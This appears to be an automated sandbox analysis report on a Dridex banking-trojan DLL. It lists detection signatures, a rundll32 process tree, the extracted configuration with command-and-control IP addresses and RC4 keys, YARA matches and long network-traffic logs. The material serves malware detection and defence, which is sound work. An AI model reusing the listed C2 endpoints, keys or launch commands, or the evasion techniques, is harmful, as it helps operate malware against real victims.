
Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.28061.5528

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Razy.980776.28061.5528 (renamed file extension from 5528 to dll)
Analysis ID: 510685
MD5: e2ba080ddec587a157309bdf0a5442ce
SHA1: 62edb669f364788f1a95fd59d41efbb3df1e0dfb
SHA256: a4a8b8ef4a801ff1abb10be76c32881cf9adb4f6a784ad0e84e65d55ed1cf7ca
Tags: dll

Detection

Dridex
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5588 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2268 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5584 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2036 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2888 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6116 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.326244435.0000000004CB0000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000003.00000003.323665839.0000000000ED0000.00000040.00000010.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000000.00000002.771060361.000000006EB91000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000007.00000003.370833938.0000000004CA0000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000004.00000002.772113565.000000006EB91000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
5.3.rundll32.exe.cfdb55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
3.3.rundll32.exe.eedb55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
7.3.rundll32.exe.4cbdb55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
0.3.loaddll32.exe.170db55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
7.3.rundll32.exe.4cbdb55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.rundll32.exe.6eb90000.0.unpack | Malware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Virustotal: Detection: 7%
Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Razy.980776.28061.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb | source: loaddll32.exe, 00000000.00000002.771396615.000000006EC57000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.772256602.000000006EC57000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.28061.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6EBBCEF8 FindFirstFileExW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.77.0.96 235
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.56.219.47 180
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.46.210.220 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 143.244.140.214 40
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | IPs: 192.46.210.220:443
Source: Malware configuration extractor | IPs: 143.244.140.214:808
Source: Malware configuration extractor | IPs: 45.77.0.96:6891
Source: Malware configuration extractor | IPs: 185.56.219.47:8116
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | ASN Name: KELIWEBIT KELIWEBIT
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4844 Connection: Close Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4832 Connection: Close Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 45.77.0.96 45.77.0.96
Source: Joe Sandbox View | IP Address: 185.56.219.47 185.56.219.47
Source: global traffic | TCP traffic: 192.168.2.5:49749 -> 143.244.140.214:808
Source: global traffic | TCP traffic: 192.168.2.5:49754 -> 45.77.0.96:6891
Source: global traffic | TCP traffic: 192.168.2.5:49757 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
